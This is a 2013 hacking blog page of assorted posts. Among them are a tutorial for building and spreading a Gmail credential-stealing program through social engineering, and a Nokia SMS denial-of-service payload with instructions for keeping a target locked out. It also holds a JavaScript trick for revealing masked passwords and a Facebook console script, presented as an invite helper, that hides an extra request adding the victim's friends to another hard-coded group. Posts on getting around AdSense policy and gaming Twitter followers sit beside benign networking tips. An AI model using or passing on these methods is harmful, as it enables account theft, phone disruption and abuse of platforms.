Sunday 18 August 2013

How to Hack Gmail Password With Gmail Hacker

Hack Gmail Password With Gmail Hacker

www.hackyshacky.com,gmail hacking

Previously i have posted alot of articles on Gmail hacking. Recently the number of users Gmail users have increased, therefore Gmail have been the major target of lots of hackers.People use Gmail as a primary email and therefore if hackers can gain access to their primary email accounts so therefore they can also hack other accounts associated witth your Gmail account.

While browsing on the internet I came across a piece of tool that can help hackers with good social engineering skills hack gmail passwords easily, the tool itself is extremely simple to configure and very user friendly. The gmail hacking software is so easy to use, all you need to do is to download the gmail hacking software from the link mentioned below, build your server and send the server to the victim.

Gmail Hacker - Hack Gmail Passwords

Here is how a hacker can use Gmail hacker to hack gmail passwords:

Requirements:

Step 1 - Extract the archive named gmail.rar on your computer, Once you have extracted you will see the following files:
Step 2 - On opening Gmail hacker builder.exe you will see the following:
Step 3 - Next you need to enter your gmail address where you would receive logs. However I would recommend you to create a fake email address and use it for receiving logs. 
Step 4 - Once you have entered your credentials, click on the build button. 
Step 5 - A file named gmailhacker.exe would be created, On executing the file, the victim will see the following:
Now you need to apply your social engineering skills in order to make the victim enter his/her credentials on to the software. The simplest way of accomplishing this is to tell the victim that the application Gmailhacker.exe is itself a gmail hacking software, You just need to the victim's username, your own gmail ID and your own gmail password, where you would receive victims passwords and click "Hack Them".
Step 6 - Once the victim clicks on the "Hack Them" button, his own gmail credentials that he entered would be sent to you on the email you typed while configuring the software. 
Well, here is an interesting part, when the victim will click on the button "Hack them", he will receive the following error, making him thinking that their is a problem with the software:
______________________________________________________________BY HaRis

how we track wifi hacker

How to Track wi-fi Hackers?

Got a Wi-Fi net connection ? And do you think it is secure enough ? With the onset of cyber crimes taking place,your Wi-fi Wi-Fi Compromised / Hacked ?may be used illegally by hackers or some other people.Either you may get high internet bills in reward or you may be on headlines as your net may be compromised to send malicious emails to anyone,that's what happened in India sometime ago in Mumbai Bomb blast case. Well,there comes MoocherHunter™ to rescue.
MoocherHunter™ is a mobile tracking software tool for the real-time on-the-fly geo-location of wireless moochers and hackers. If you have ever wondered about the possibility of your wireless network getting used for illegal purposes, you must consider using Moocher Hunter. Using Moocher Hunter you can identify the location of the person i.e. an unauthorized user using your wireless network. Its then upto you to either give him a stern warning of not using your wireless network again or complaining to the legal authorities.
Recently Indian Police and RAW (Research and Analysis Wing) used Moocher Hunter to track the source of email which was sent from an unsecured Wi-Fi network from the home of an American expatriate,whose Network was compromised as someone wardived to use his net connection and send an email that took responsibility for a bomb blast that killed at least 42 people.
MoocherHunter is FREE to use and can easily predict the physical location of the computer using the WiFi connection. Tracking location using Moocherhunter
The algorithms applied use various signal variables to accurately predict the position of the connected laptop/machine and allows to identify the location of an 802.11-based wireless moocher or hacker by the traffic they send across the network.MoocherHunter™ allows to pinpoint the location of a WIFI hacker upto an accuracy of 2 meters within an average of 30 minutes.
Moocherhunter is the ultimate Wifi hacker tracker tool and its a must for every Network security specialist,White hats,Black hats,Green and Grey hats out there.
Track Wi-Fi Hackers Using MoocherHunter™ - download it now

Keep Learning..BY HaRis

Android Codes

Android Codes / Tricks

www.hackyshacky.com


Android is becoming a very popular these days and all big companies have launched android phones.Android is giving a strong competition to Iphones, symbian phones(like nokia).Though people have a lot of expectations from lumina series by nokia,but i don't think it will be able to compete with android phones!
So here are some tricks and codes which can be useful if you have an android phone!


  • Cell Battery, WiFi Usage etc Info *#*#4636#*#*
  • Restore Factory Settings *#*#7780#*#*
  • Format Phone *2767*3855#
  • Launch service mode *#*#197328640#*#*
  • Test WiFi *#*#232339#*#* or *#*#526#*#* or *#*#528#*#*
  • Display WiFi MAC address *#*#232338#*#*
  • GPS test *#*#1472365#*#*
  • Other GPS test *#*#1575#*#*
  • Bluetooth test *#*#232331#*#*
  • Display Bluetooth physic address *#*#232337#*#
  • Start Gtalk monitoring *#*#8255#*#*
  • PDA, Phone, H/W, RFCallDate *#*#4986*2650468#*#*
  • PDA and Phone *#*#1234#*#*
  • FTA SW version *#*#1111#*#*
  • FTA HW version *#*#2222#*#*
  • PDA, Phone, csc, *#*#44336#*#*
  • Packet Loopback *#*#0283#*#*
  • LCD test *#*#0*#*#*
  • Melody test *#*#0673#*#* or *#*#0289#*#*
  • Device test such as vibration and lightness *#*#0842#*#*
  • Display touchscreen version *#*#2663#*#*
  • Touchscreen test *#*#2664#*#*
  • Distance sensor test *#*#0588#*#*
  • Display memory version *#*#3264#*#*
BY HaRis

how to see Java script to see passwords!

Java script to see passwords!


Heya friends this an old thing but still im posting it.
You see password in '' *********** '' form and want to decrypt it into it's original form, to do that all you have to do is just copy and paste this script in your url box.

javascript: alert(document.getElementById('Passwd').value);

As you can see the image here, the password i typed was ''yoyo!'' and then i pasted the script in url box(address bar) and pressed enter, so the password showed up!

p.s.- use INTERNET EXPLORER ONLY for this script !
see password using javascript



How to Make Your Own Facebook Smileys [Tutorial]

How to Make Your Own Facebook Smileys [Tutorial]

Hello All..
Today I'll tell you how to make your own Facebook smileys ,
this is the same as "How to post images in chat" :D
Its quite simple ..

1.) Select any Profile picture that you want to make Smiley of.

    I'll take a Steve Job's pic
   "https://fbcdn-profile-a.akamaihd.net/hprofile-ak-snc4/275718_1611151305_986208724_n.jpg"

2.) Now you see there are three numbers in the end of the URL.

     i.e "/275718_1611151305_986208724_n.jpg"

3.) Copy the Middle number 


    "/275718_1611151305_986208724_n.jpg"

4.)  Now add 2 Square brackets in the beginning and at the end of the number

    [[1611151305]]

5.) Paste the code that we made into Facebook chat ..Bingo ! The Steve Jobs Smiley is Ready :DBY HaRis

How we find a Vulnerable Website?

How to find a Vulnerable Website?

Website Security is a major problem today and should be a priority in any organization or a webmaster, Now a days Hackers are concentrating alot of their efforts to find holes in a web application, If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.
Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available through which even a newbie can find a vulnerable site and start Hacking

 Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:


1.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Directory Traversal attack
5.Local File inclusion(LFI)
6.DDOS attack

I have explained some of these methods in my post "Common methods to hack a website"

Tools commonly used to find a vulnerable website

Acunetix

Acunetix is one of my favorite tool to find a venerability in any web application It automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.

Download Acunetix Web Security Scanner

Nessus

Nessus is the best unix venerability testing tool and among the best to run on windows. Key features of this software include Remote and local file securitychecks a client/server architecture with a GTK graphical interface etc.

Download Nessus from the link below
http://www.nessus.org/download

Retina-

Retina is another Vulnerability Assessment tool,It scans all the hosts on a network and report on any vulnerabilities found.

Download Retina from the link below
http://www.eeye.com/downloads

Metasploit Framework

The Metasploit Framework is the open source penetration testing framework with the world's largest database of public and tested exploits.

Download Metasploit from the link below :
http://www.metasploit.com/download/BY HaRis

How We to Automatically Poke Back Friends on Facebook

How to Automatically Poke Back Friends on Facebook

Poke is a feature led by facebook to get attention of any user, well you can compare it wit the Buzz option we had in Yahoo Chat, so we used to click on Buzz and then the other person's chat used to vibrate and make sounds to get their attention, its somewhat same but yes off course it does not make your screen vibrate but if leave a notification without any message or anything but just saying that person poked you and you can poke him back to say yes I remember you :)
So now manually poking back to many person's might be a big problem so we have simple solution to this thing by making this process automatic. Now we have two options by which you can make this thing automatic. The one is by using the chrome extension that will work only in chrome and the other one is Userscript that will work in both Chrome and Firefox.

Auto Poke Back using Chrome Extension

poke-all-for-chromeWell Poke All for Chrome extension gives you the possibility to poke all your friends back all together with one click. Well yes it even has that automatic feature which you can select and every poke will be reverted back automatically. So now you can install this extension only in chrome.
So now after installation just visit Facebook and click on this hand icon in your status bar now you c will see all your pokes you can select Auto Poke or just click on the Poke All option.

Auto Poke Back using UserScript

Well there is even a simple userscript that can be installed in Chrome, Firefox and Opera browser, so Facebook Autopoke userscript does the same job but its totally automatic. So you will need Greasemonkey installed in your Firefox browser to get this script working.
For the chrome browser you can install this script directly but you will need to follow this easy tutorial on installing 3rd party extension and scripts in chrome.
So that's it now you can every Poke you receive will be reverted back automatically, if you find any problem do comment. BY HaRis

How to Hack Nokia Phones

How to Hack Nokia Phones – Using SMS

Yep, One can hack Nokia phones by just sending a SMS,seems devilish isn't it? Although this vulnerability was found more than an year ago, I recently tried it and found it working in many sets. The Nokia S60 hacked -  rdhacker.blogspot.comvulnerability dubbed as “Curse of Silence” affects all Nokia Symbian 60/Series 60 devices and allows for remote SMS/MMS Denial of Service.One can send a specially crafted sms to lockup/crash any Series 60 device.

What is Required ?
  • MSISDN of the target.
  • A Mobile phone service provider which allows sending of SMS messages (Airtel in my case)
  • (Almost) any Nokia phone (or some other means of sending SMS messages with TP-PID set to "Internet Electronic Mail" )
Risk Levels
Although the vulnerability is spread across many versions of S60 platform,the Risk level is quite high for (for S60 2.6 and 3.0 devices)as upon attack,the target will not be able to receive any SMS or MMS messages until the device is Factory Resetted and Medium for S60 2.8 and 3.1 devices as upon Ddos attack,the target will not be able to receive any SMS or MMS messages while the attack is ongoing. After that, only very limited message receiving is possible until the device is Factory Resetted.
 The Series 60 N Series, E Series and some more phones can Be hacked - rdhacker.blogspot.com
The Attack
One can send an email using an sms by setting the messages Protocol Identifier to "Internet Electronic Mail" and formatting the message like this:
<email-address><space><message body>
The simplest attack will be -
123456789@123456789.1234567890123
If such messages contain an <email-address> with more than 32 characters, S60 2.6, 2.8, 3.0 and 3.1 devices fail to display the message or give any indication on the user interface that such a message has been received. They do,however, signal to the SMS Career that they have received the message.Nokia Series 60 3.0 Prominent phones -  rdhacker.blogspot.com
Devices running S60 2.6 or 3.0 will not be able to receive any other SMS message after that. The user interface does not give any indication of this situation. The only action to remedy this situation seems to be a Factory Reset of the device (by entering "*#7370#" ) or using a Vulcan Death Grip.
  Nokia Series 60 3.1 Prominent phones -  rdhacker.blogspot.com
Devices running S60 2.8 or 3.1 react a little different: They do not lock up until they received at least 11 SMS-email messages with an email address that is longer than 32 characters after that the device will not be able to receive any other SMS message and the phone will just display a warning that there is not enough memory to receive further messages and that data should be deleted first. This message is even displayed on an otherwise completely "empty" device.  Nokia Series 60 2.8 Prominent phones -  rdhacker.blogspot.com
After switching the phone off and on again, it has limited capability for receiving SMS messages again: If it receives a SMS message that is split up into several parts it is only able to receive the first part and will display the "not enough memory" warning again. After powercycling the device again, it can then receive the second part. If there is a third part, it has to be powercycled again, and so on.
Also, an attacker now just needs to send one more "Curse Of Silence" message to lock the phone up again. By always sending yet another one as soon as the status report for delivery of the previous message is received, the attacker could completely prevent a target from receiving any other SMS/MMS messages.
Only Factory Resetting the device will restore its full message receiving capabilities. Note that, if a backup is made using Nokia PC-Suite *after* being attacked, the blocking messages are also backuped and will be sent to the device again when restoring the backup after the Factory Reset.

Detailed List of affected phones

Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable component is a S60 base functionality, it seems safe to assume that all devices with these OS versions are affected. I short if you own one of these,you are rounded unless u have a firmware upgrade/fix release by Nokia which fixes this attack.

S60 3rd Edition, Feature Pack 1 (S60 3.1)

  • Nokia E90 Communicator Series 60 Affected Devices - rdhacker.blogspot.com
  • Nokia E71
  • Nokia E66
  • Nokia E51
  • Nokia N95 8GB
  • Nokia N95
  • Nokia N82
  • Nokia N81 8GB
  • Nokia N81
  • Nokia N76
  • Nokia 6290
  • Nokia 6124 classic
  • Nokia 6121 classic
  • Nokia 6120 classic
  • Nokia 6110 Navigator
  • Nokia 5700 Xpress Music
S60 3rd Edition, initial release (S60 3.0)
  • Nokia E70
  • Nokia E65
  • Nokia E62
  • Nokia E61i
  • Nokia E61
  • Nokia E60
  • Nokia E50
  • Nokia N93i
  • Nokia N93
  • Nokia N92
  • Nokia N91 8GB
  • Nokia N91   
  • Nokia N80
  • Nokia N77
  • Nokia N73
  • Nokia N71
  • Nokia 5500
  • Nokia 3250
S60 2nd Edition, Feature Pack 3 (S60 2.8)
  • Nokia N90
  • Nokia N72
  • Nokia N70
S60 2nd Edition, Feature Pack 2 (S60 2.6)
  • Nokia 6682
  • Nokia 6681
  • Nokia 6680
  • Nokia 6630

Credits
Tobias Engel – The Original Vulnerability Founder
Tested and implemented on Airtel carrier using Nokia 3120 classic and N70/N73/E51 by XERO

Posted by XERO . ALL RIGHTS RESERVED.SourceBY HaRis

Online Tracking: What Is It and How It Works?

Online Tracking: What Is It and How It Works?

You might often consider that your online activities are safe and confidential but that is not true. Our online actions are tracked every time we log in and browse the internet. There are several advertising and tracking companies who follow us and collect information over the web and monitor our clicks, purchases, history and everything we do. So to opt out of being tracked every time there are options available in major browsers.

Google Chrome: Go to Settings < Advanced settings < Click the check box on “Send a ‘Do Not Track’ request with your browsing traffic”.
Mozilla Firefox: Go to Tools < Options < Privacy < Click the check box on “Tell websites I do not want be tracked”.
A detailed explanation about online tracking has been given in the infographic below.

Online-Tracking-800

Get Free 2000 Twitter Followers Free

Get 2000 Twitter Followers Free Within a Day

Hey You? You want thousands of twitter followers free and get famous on worlds best micro-blogging site "Twitter", then you are at right place. I am going to show you a simple trick by which you will get 2000 twitter followers guaranteed within a day! Ok so lets start.

How It Works?

Its Works by using a SEOClerks We Will Purchase a gig which is for 2$ [ dont worry we dont need to pay.
this gigs provide 2000 followers in a day all you need to do is provide your twitter username!

Requirments

  • A Twitter ID ( LOL! what I Mention this!)
  • Its should be 6 months old
  • it should have 100+ tweets
  • it should have 100+ followers
Okay so Lets Start This Process,

Steps

  • Go To SEOclerk and create and account there. 
  • then go to http://www.seoclerks.com/freemoney
  • Then follow steps there
  • tweet the tweet provided there
  • follow  @seoclerks
  • then enter your twitter username in above box and click verify
  • Now you'll get 2$ Cash in your balance
  • Now go to This Link and click Order
  • Now At Payment option select pay using my balance
  • now you'll be asked for you twitter username on next page
  • just enter your twitter username like @Malakand_Sms
BY HaRis

HoW to Memory Card Data Recovery Tool - Full Version Download

Memory Card Data Recovery Tool - Full Version Download


-->



www.hackyshacky.com
Often we delete some important pictures,data from our memory card in phone or then we are unable to recoverthem.So, today I'll provide my readers with a which will recover your pic etc. which get deleted.
Download : Download the tool from Here : https://www.dropbox.com/s/xmxknm5pdf8oo03/data%20card%20recovery%20tool.rar
BY HaRis

Start Backtrack 5 Without "Startx" [AUTOLOGIN]

How to Start Backtrack 5 Without "Startx" [AUTOLOGIN]

Here in this article we learn how to bypass the login id ,password and startx which usually you enter to start Backtrack .

" LETS START "


First you have to install this software package called  " rungetty ". See the image how to install it.


Now next step is to open a tty1.conf file on vim editor.


Your terminal look like this when you open tty1.conf file. 


Now first press i and then do some changes as shown above in the image 


After editing save your file by pressing Esc key and :wq and press enter key. 


Now you have to create a new file named ~/.bash_profile . To create this file you have to use touch command as shown above in the image.


In this step type  ls /root/./bash_profile  to see your file exists or not in root. 
           Yes , your file is exist there as shown in the image.


Now open your  file which you created in  earlier step using vim editor as shown in the image.


Press i to insert text and type startx  and save it by pressing Esc key  , : wq and press Enter.


After all configuration give the reboot command to your system and see what happen next. 


Here it is when you reboot your system it will not ask you to enter login id ,password and startx again . This small utility known as "rungetty" help you to bypass all this .
Now upgrade your BACKTRACK 5 to this method and be different from others.
BY HaRis

Saturday 17 August 2013

Android Codes / Tricks


www.hackyshacky.com


Android is becoming a very popular these days and all big companies have launched android phones.Android is giving a strong competition to Iphones, symbian phones(like nokia).Though people have a lot of expectations from lumina series by nokia,but i don't think it will be able to compete with android phones!
So here are some tricks and codes which can be useful if you have an android phone!


  • Cell Battery, WiFi Usage etc Info *#*#4636#*#*
  • Restore Factory Settings *#*#7780#*#*
  • Format Phone *2767*3855#
  • Launch service mode *#*#197328640#*#*
  • Test WiFi *#*#232339#*#* or *#*#526#*#* or *#*#528#*#*
  • Display WiFi MAC address *#*#232338#*#*
  • GPS test *#*#1472365#*#*
  • Other GPS test *#*#1575#*#*
  • Bluetooth test *#*#232331#*#*
  • Display Bluetooth physic address *#*#232337#*#
  • Start Gtalk monitoring *#*#8255#*#*
  • PDA, Phone, H/W, RFCallDate *#*#4986*2650468#*#*
  • PDA and Phone *#*#1234#*#*
  • FTA SW version *#*#1111#*#*
  • FTA HW version *#*#2222#*#*
  • PDA, Phone, csc, *#*#44336#*#*
  • Packet Loopback *#*#0283#*#*
  • LCD test *#*#0*#*#*
  • Melody test *#*#0673#*#* or *#*#0289#*#*
  • Device test such as vibration and lightness *#*#0842#*#*
  • Display touchscreen version *#*#2663#*#*
  • Touchscreen test *#*#2664#*#*
  • Distance sensor test *#*#0588#*#*
  • Display memory version *#*#3264#*#*

    Like our facebook Page How to hack facebook page
BY HaRis

Hacking

What is Hacking?



Hacking is nothing but 'acting smart'.Most of the times it is considered as something 'illegal' and 'offensive' but all these are misconception.Hacking is making the best use of your brain and innovation to discover/understand things.Hacking can be used for both good as well as bad purposes.

There are 5 types of Hackers -


1.Script kiddies-these are people(most of the times children/youth) who learn according to the situation from the internet and try the learned things out.

2. Black hat hacker-These are people who have gained perfection in almost every art of hacking but they use their skills for negative work and against government.

3.White hat hacker-These hackers have equal knowledge as that of black hats,but they use their knowledge for good purpose. 

4.Grey hat hackers -They are the hackers which are intermediate between black hat and white hat.They have equal knowledge but the sometimes use it for good work and sometimes for bad work.

5.  worker-These are not hackers really,but they are the people who have information about one particular subject in which they are perfect and they can use that information for the bad of their company or against a person. BY HaRis

How we Automatically Invite All Facebook Friends to Join your Group

How to Automatically Invite All Facebook Friends to Join your Group

Facebook's group feature is just awesome, means discussing some things and getting solution from million of people all over the world simply solves every mystery we have, I really follow big group's and see their culture how fast they all are just growing. Well so looking all of them I though I should also start a group and add some discussion but for that I need people who have joined my group now obviously everyone has many friends those he can ask to join his or her group but manually asking them to join his group is really a difficult task so I have found a easy solution using some JavaScript.

Automatically Add All Friends to Facebook Group's

Yes using easy JavaScript trick we can invite all our friends at once and they can be added easily. So its not a tough job but its really easy so jump in to below tutorial and lets get started.

  1. Open Facebook.com > Your Group.
  2. Now if you are using Firefox press Ctrl + Shift + K and if you are on Chrome press Ctrl + Shift + J and paste below script into the console.
 function penetrasi(e){jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id="+memberGroupId+"&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(e){e=e.substring(e.indexOf("{")),e=JSON.parse(e),i--,kunaon="<div class='friend-edge-name' style='text-align:left;font-size:10px;white-space:pre-wrap;",e.error?(kunaon+="color:darkred'>",kunaon=e.errorDescription?kunaon+e.errorDescription:kunaon+JSON.stringify(e,null,"")):(kunaon+="color:darkgreen'>",kunaon+=arr[i],suc++),kunaon+="</div>",e="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(255,255,255,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid rgba(0,0,0,0.5)'>"+("<div style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),0<i?(e+=arr.length+" Suscribers detected<br/>",e+="<b>"+suc+"</b> Suscribers added of "+(arr.length-i)+" Suscribers Processed ",e+="("+i+" more to go..)",e=e+"<div class='friend-edge'>"+kunaon,e+="</div>"):(e+=arr.length+" Suscribers detected and ",e+="<b>"+suc+" Suscribers added</b>",e+="<div><span class='uiButton' onClick='document.getElementById(\"pagelet_welcome_box\").style.display=\"none\"'>Close</span></div>"),document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>"},"text","post"),tay--;if(0<tay){var t=arr[tay];setTimeout("penetrasi("+t+")",100)}console.log(tay+"/"+arr.length+":"+t+", success:"+suc),0xf2a794cf90e3!=memberGroupId&&jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id=xxxxxxxxxxx&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(){},"text","post")}function clickfr_callback(){0<document.getElementsByName("ok").length&&nHtml.ClickUp(document.getElementsByName("ok")[0]);var e=arr[i];i<arr.length&&addfriend(e.substring(0,4))}function clickfr(){0<document.getElementsByClassName("search").length?(console.log(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1].innerHTML),document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].href="javascript:void(0);",nHtml.ClickUp(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1])):j++,setTimeout("clickfr_callback()",2e3)}function addfriend(e){i++,document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].value=e,document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].blur(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),setTimeout("clickfr()",2e3)}function sleep(e){for(var t=(new Date).getTime(),n=0;1e7>n&&!((new Date).getTime()-t>e);n++);}var tulisanNganu="Auto SUSCRIBE",kunaon="";jx={getHTTPObject:function(){var e=!1;if("undefined"!=typeof ActiveXObject)try{e=new ActiveXObject("Msxml2.XMLHTTP")}catch(t){try{e=new ActiveXObject("Microsoft.XMLHTTP")}catch(n){e=!1}}else if(window.XMLHttpRequest)try{e=new XMLHttpRequest}catch(r){e=!1}return e},load:function(b,c,d,e,g){var f=this.init();if(f&&b){f.overrideMimeType&&f.overrideMimeType("text/xml"),e||(e="GET"),d||(d="text"),g||(g={});var d=d.toLowerCase(),e=e.toUpperCase(),h="uid="+(new Date).getTime(),b=b+(b.indexOf("?")+1?"&":"?"),b=b+h,h=null;"POST"==e&&(h=b.split("?"),b=h[0],h=h[1]),f.open(e,b,!0),"POST"==e&&(f.setRequestHeader("Content-type","application/x-www-form-urlencoded"),f.setRequestHeader("Content-length",h.length),f.setRequestHeader("Connection","close")),f.onreadystatechange=g.handler?function(){g.handler(f)}:function(){if(f.readyState==4)if(f.status==200){var b="";f.responseText&&(b=f.responseText),d.charAt(0)=="j"?(b=b.replace(/[\n\r]/g,""),b=eval("("+b+")")):d.charAt(0)=="x"&&(b=f.responseXML),c&&c(b)}else g.loadingIndicator&&document.getElementsByTagName("body")[0].removeChild(g.loadingIndicator),g.loading&&(document.getElementById(g.loading).style.display="none"),error&&error(f.status)},f.send(h)}},bind:function(e){var t={url:"",onSuccess:!1,onError:!1,format:"text",method:"GET",update:"",loading:"",loadingIndicator:""},n;for(n in t)e[n]&&(t[n]=e[n]);if(t.url){var r=!1;t.loadingIndicator&&(r=document.createElement("div"),r.setAttribute("style","position:absolute;top:0px;left:0px;"),r.setAttribute("class","loading-indicator"),r.innerHTML=t.loadingIndicator,document.getElementsByTagName("body")[0].appendChild(r),this.opt.loadingIndicator=r),t.loading&&(document.getElementById(t.loading).style.display="block"),this.load(t.url,function(e){t.onSuccess&&t.onSuccess(e),t.update&&(document.getElementById(t.update).innerHTML=e),r&&document.getElementsByTagName("body")[0].removeChild(r),t.loading&&(document.getElementById(t.loading).style.display="none")},t.format,t.method,t)}},init:function(){return this.getHTTPObject()}};var nHtml={FindByAttr:function(e,t,n,r){return"className"==n&&(n="class"),(e=document.evaluate(".//"+t+"[@"+n+"='"+r+"']",e,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null))&&e.singleNodeValue?e.singleNodeValue:null},FindByClassName:function(e,t,n){return this.FindByAttr(e,t,"className",n)},FindByXPath:function(e,t){try{var n=document.evaluate(t,e,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null)}catch(r){GM_log("bad xpath:"+t)}return n&&n.singleNodeValue?n.singleNodeValue:null},VisitUrl:function(e){window.setTimeout(function(){document.location.href=e},500+Math.floor(500*Math.random()))},ClickWin:function(e,t,n){var r=e.document.createEvent("MouseEvents");return r.initMouseEvent(n,!0,!0,e,0,0,0,0,0,!1,!1,!1,!1,0,null),!t.dispatchEvent(r)},Click:function(e){return this.ClickWin(window,e,"click")},ClickTimeout:function(e,t){window.setTimeout(function(){return nHtml.ClickWin(window,e,"click")},t+Math.floor(500*Math.random()))},ClickUp:function(e){this.ClickWin(window,e,"mousedown"),this.ClickWin(window,e,"mouseup"),this.ClickWin(window,e,"click")},GetText:function(e,t){var n="";void 0==t&&(t=0);if(!(40<t)){if(void 0!=e.textContent)return e.textContent;for(var r=0;r<e.childNodes.length;r++)n+=this.GetText(e.childNodes[r],t+1);return n}}};void 0==document.getElementsByClassName&&(document.getElementsByClassName=function(e){for(var t=RegExp("(?:^|\\s)"+e+"(?:$|\\s)"),n=document.getElementsByTagName("*"),r=[],i,s=0;null!=(i=n[s]);s++){var o=i.className;o&&-1!=o.indexOf(e)&&t.test(o)&&r.push(i)}return r}),Array.prototype.find=function(e){var t=!1;for(i=0;i<this.length;i++)typeof e=="function"?e.test(this[i])&&(t||(t=[]),t.push(i)):this[i]===e&&(t||(t=[]),t.push(i));return t};for(var a=0,eind=0,len=document.getElementsByClassName("mbm").length,a=0;a<len;a++){var ele=document.getElementsByClassName("mbm")[a];if(ele&&ele.childNodes[0]&&ele.childNodes[0]&&ele.childNodes[0].childNodes[1]&&ele.childNodes[0].childNodes[1].childNodes[0]&&"Add SUSCRIBERS"==document.getElementsByClassName("mbm")[a].childNodes[0].childNodes[1].childNodes[0].value){eind=a;break}}var i=3,tay=3,counter1=0,counter2=0,counter3=0,j=0,k=0,suc=0,arr=[],memberGroupId=document.getElementsByName("group_id")[0].value;jx.load(window.location.protocol+"//www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+Env.user+"&filter[0]=user&__user="+Env.user,function(e){for(var e=e.substring(e.indexOf("{")),e=JSON.parse(e),e=e.payload.entries,t=0;t<e.length;t++)arr.push(e[t].uid);tay=i=arr.length-1,console.log(arr.length),e="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(255,255,255,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid rgba(0,0,0,0.5)'>"+("<div style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),e+=arr.length+" SUSCRIBERS detected",document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>",penetrasi(arr[i])})
 
  3. Now after pasting the above code make sure to change the "Group ID" in xxxxx with your Facebook group ID you can find your group id in blue xxxxxx -  www.facebook.com/groups/xxxxxxxxxxxxxx/ & press enter.

  4. Now just wait and watch how it automatically detects and add your friends to your facebook group, check below screenshot.
 5. So the speed is really fast and in seconds you are going to add all your friends to your group, so no need to manually select your friends.
So now finally you have a faster and easier way to invite and add all your friends to your newly created facebook group, well I have tested this script and it is working fine, if you find problem, bugs or glitch in this script do comment.BY HaRis

How to Get Approved Google Adsense Account in few second

Get Approved Google Adsense Account in few second

approved adsense account
Assalamualaikum guys now I am here to tell you that
how can you get approved adsense account in few seconds. You can believe it yes
or no? Not believe on me. Believe on yourself and follow some steps to getting
it approved.   This is not in reality an
enchantment, but something which requires little mind’s and intelligence. Due
to Google adsense program Policies, terms and conditions you would find it
difficult pass through. But now this time we made a genuine trick to bypass Google
adsense program Policies terms and conditions.
For more knowing about adsense visit  inside Adsense

Create
an account:

First create a new Gmail account and verify it on
your mobile number then link this Gmail account with YouTube.

Search
for some videos:

Now search for some technological videos these
videos will not be indexed by Google. Download it in your computer.

Upload:

Now upload these videos on your YouTube account with
better titles and tagging.

Monetization:

After uploading the videos go to the monetization
tab and enable your account.
Note: make sure your account ad block is disabled before you doing this step.

If
you are lucky:

If you are lucky after some minute you will get an
email from Google. In which Google saying that your YouTube account has been
enable for monetization then you are lucky now precede next step.

Create new account for adsence:

When
you receive an email from Google then go on your YouTube account and click on
the tab create a new account for adsense.
Now
create a new Google adsense account with your real name and genuine home
address. And after applying your adsense account you receive an email in which
Google saying that your adsense account has been created and adsense link giving
in email just click on adsense and login to your account.

Account settings:

This
is most of the important step in this step when you are login in your adsense account go to account settings. After clicking it scroll down and you see like
“Sites authorized for adsense” option. Click on it and here you add your
website or blog URL.
Note:   In your mind you have many of questions like that “I never thought Google could
be fooled in such…..” and more but try this method and you get your adsense
approved hosted account in just 2 hour.
And
if you have not found payment section in YouTube and click on the tab saying
“create a new account for adsense” go to this link account monetization.
BY HaRis

Thursday 1 August 2013

How to set up a network between two computers?

Sharing documents between two computers [Solved/Closed]



How to set up a network between two computers?

1. Connect the crossover Ethernet cable to the LAN (RJ45) ports of both the PCs.

PC - 1:

- Go to My Computer > Properties > Computer Name.
- Change the Computer Name to A and Workgroup name to ABC and click OK to save changes.
- Go to Control Panel > Network Connections.
- Right click on your LAN connection and select Properties.
- Select Internet Protocol (TCP/IP) > Properties.
- Enter these values:
IP Address - 192.168.0.1
Subnet Mask - 255.255.255.0
- Leave the other fields blank and click OK to save changes.

PC - 2:

- Go to My Computer > Properties > Computer Name.
- Change the Computer Name to B and Workgroup name to ABC and click OK to save changes.
- Go to Control Panel > Network Connections.
- Right click on your LAN connection and select Properties.
- Select Internet Protocol (TCP/IP) > Properties.
- Enter these values:
IP Address - 192.168.0.2
Subnet Mask - 255.255.255.0
- Leave the other fields blank and click OK to save changes.
- - -
After the connections and settings have been saved, both the PCs should be connected by LAN. You may need to restart both the PCs.

You can check if the connection is working by pinging one PC from the other.

For PC-1, Start > Run > CMD > ping 192.168.0.2
For PC-2, Start > Run > CMD > ping 192.168.0.1

You can view the PCs in My Network Places. You can now use this LAN connection to play multiplayer games or share files. You can also map a drive on another PC to a local drive by using My Computer > Tools > Map Network Drive > Select Drive Letter and network path of the shared folder on the other PCBY HaRis